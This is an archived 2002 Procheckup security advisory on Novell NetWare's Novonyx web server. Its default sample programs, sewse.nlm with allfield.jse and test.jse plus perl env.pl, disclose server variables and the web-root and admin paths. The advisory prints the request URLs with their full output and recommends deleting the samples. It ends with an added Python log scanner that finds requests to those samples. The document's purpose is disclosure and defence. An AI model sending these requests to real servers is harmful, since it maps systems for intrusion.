Vulnerability in Novell Netware 5.0 (part1)

From: webmasterat_private
Date: Wed May 29 2002 - 06:27:45 PDT

    Procheckup Ltd
    www.procheckup.com    
    
    Procheckup Security Bulletin PR02-1
    
    	   
      Description: NetWare default programs display server variables, including the web root location
             Date: 8/1/2002
    
      Application: Netware enterprise web server
         Platform: Novell NetWare 5.0
         Severity: Remote attackers can discover the location of the webroot.
          Authors: Richard Brain [richard.brainat_private]
    Vendor Status:
    CVE Candidate: Not assigned
        Reference: www.procheckup.com/security_info/vuln.html
    
      Description:
     NetWare 5.1, installed with default settings, includes the
    Novonyx webserver.  This webserver listens on port 80 and
    comes with sample files which disclose information.
    
    
    1) Requesting the following URL :-
    http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
    
    The following information is returned:-
    Here are the ScriptEase:WSE input values
    _argv[-1] = "SEWSE" 
    _argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE" 
    
    Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
    Here are the cgi.getVar() values
    Here are the Clib.getenv() values
    HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
    HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm 
    HTTP_ACCEPT_LANGUAGE=en-gb 
    HTTP_ACCEPT_ENCODING=gzip, deflate 
    HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461) 
    HTTP_HOST=192.168.1.109 
    HTTP_CONNECTION=Keep-Alive 
    HTTP_COOKIE=N2S19P61=963269677 
    ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config 
    NETSITE_ROOT=/novonyx/suitespot 
    SERVER_NAMES=lcgi 
    ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null 
    SERVER_SOFTWARE=Netscape 3.5 for NetWare 
    SERVER_PORT=80 
    SERVER_NAME=NETWARE.PROCHECKUP.COM 
    SERVER_URL=http://192.168.1.109 
    REMOTE_HOST=192.168.1.250 
    REMOTE_ADDR=192.168.1.250 
    HTTPS=OFF 
    GATEWAY_INTERFACE=LCGI/1.1 
    SERVER_PROTOCOL=HTTP/1.1 
    REQUEST_METHOD=GET 
    SCRIPT_NAME=/lcgi/sewse.nlm 
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse 
    NS_SESSION=-751448704 
    NS_REQUEST=-695399320 
    FN=lcgi_map_init 
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 
    
    ==========================================================
    
    2) ALSO
    
    Requesting the following URL :-
    http://192.168.1.109/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse
    
    The following information is returned:-
    
    SERVER_SOFTWARE=Netscape 3.5 for NetWare 
    SERVER_PORT=80 
    SERVER_NAME=NETWARE.PROCHECKUP.COM 
    SERVER_URL=http://192.168.1.109 
    REMOTE_HOST=192.168.1.250 
    REMOTE_ADDR=192.168.1.250 
    HTTPS=OFF 
    GATEWAY_INTERFACE=LCGI/1.1 
    SERVER_PROTOCOL=HTTP/1.1 
    REQUEST_METHOD=GET 
    SCRIPT_NAME=/lcgi/sewse.nlm 
    QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
     
    NS_SESSION=-798892160 
    NS_REQUEST=-800372600 
    FN=lcgi_map_init 
    PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
    CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 
    http://192.168.1.109
    
    3) ALSO
    
    Requesting the following URL :-
    http://webserver/perl/samples/env.pl
    
    The following information is returned:-
    
    HSERVER_SOFTWARE Netscape 3.5 for NetWare 
    GATEWAY_INTERFACE LCGI/1.1 
    NS_SESSION -707141760 
    REMOTE_ADDR 192.168.1.250 
    SERVER_PROTOCOL HTTP/1.1 
    NS_REQUEST -695399320 
    PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl 
    REQUEST_METHOD GET 
    REMOTE_HOST 192.168.1.250 
    SERVER_URL http://192.168.1.109 
    SERVER_NAMES perl 
    HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461) 
    HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */* 
    HTTP_CONNECTION Keep-Alive 
    HTTP_ACCEPT_LANGUAGE en-gb 
    HTTPS OFF 
    CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/ 
    FN lcgi_map_init 
    SCRIPT_NAME /perl 
    HTTP_ACCEPT_ENCODING gzip, deflate 
    ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config 
    PERL_ROOT SYS:novonyx/suitespot/docs/perlroot 
    SERVER_NAME NETWARE.PROCHECKUP.COM 
    PATH_INFO /samples/env.pl 
    HTTP_COOKIE N2S19P61=963269677 
    SERVER_PORT 80 
    ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null 
    HTTP_HOST 192.168.1.109 
    PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl 
    NETSITE_ROOT /novonyx/suitespot 
    
    Solution:
    
    Delete all default example programs if not needed.
    
    Legal:
    
    Copyright 2002 Procheckup Ltd. All rights reserved.
    
    Permission is granted for copying and circulating this 
    Bulletin to the Internet community for the purpose of 
    alerting them to problems, if and only if, the Bulletin is 
    not edited or changed in any way, is attributed to 
    Procheckup, and provided such reproduction and/or 
    distribution is performed for non-commercial purposes.
    
    
    Any other use of this information is prohibited. 
    Procheckup is not liable for any misuse of this 
    information by any third party.
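
One way to check web-server access logs for requests to the three sample programs listed in the bulletin, and to see which of them are still being served. This is an added example, not part of the Procheckup bulletin; it assumes access logs in Common Log Format, and the log lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# The three sample programs named in the bulletin. NetWare paths are
# case-insensitive, so targets are lower-cased before matching.
SAMPLE_PATTERNS = [
    ("sewse allfield.jse", re.compile(r"^/lcgi/sewse\.nlm\?.*allfield\.jse$")),
    ("sewse test.jse", re.compile(r"^/lcgi/sewse\.nlm\?.*test\.jse$")),
    ("perl env.pl", re.compile(r"^/perl/samples/env\.pl(\?.*)?$")),
]

# Assumed log format (Common Log Format):
# host ident user [time] "METHOD target PROTOCOL" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+)[^"]*" (\d{3}) \S+')

def find_sample_hits(lines):
    """Return (client, sample, status) for each request to a listed sample."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF request line
        client, target, status = m.groups()
        normalized = unquote(target).lower()  # undo %-encoding and case changes
        for label, pattern in SAMPLE_PATTERNS:
            if pattern.match(normalized):
                hits.append((client, label, int(status)))
                break
    return hits

def still_served(hits):
    """Samples answered with 200, i.e. still installed and disclosing data."""
    return sorted({label for _client, label, status in hits if status == 200})

# Constructed log lines for illustration (not taken from a real server).
SAMPLE_LOG = [
    '192.168.1.250 - - [29/May/2002:06:27:45 -0700] "GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1" 200 2311',
    '192.168.1.250 - - [29/May/2002:06:28:02 -0700] "GET /LCGI/SEWSE.NLM?SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/TEST.JSE HTTP/1.1" 200 1204',
    '192.168.1.250 - - [29/May/2002:06:28:40 -0700] "GET /perl/samples/env%2Epl HTTP/1.0" 404 207',
    '192.168.1.250 - - [29/May/2002:06:29:11 -0700] "GET /index.html HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for hit in find_sample_hits(SAMPLE_LOG):
        print(hit)
    print("still served:", still_served(find_sample_hits(SAMPLE_LOG)))
```

A 404 for a sample path indicates that program has been removed as the Solution recommends; a 200 means the server still returns the variable dump to whoever asked.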
    


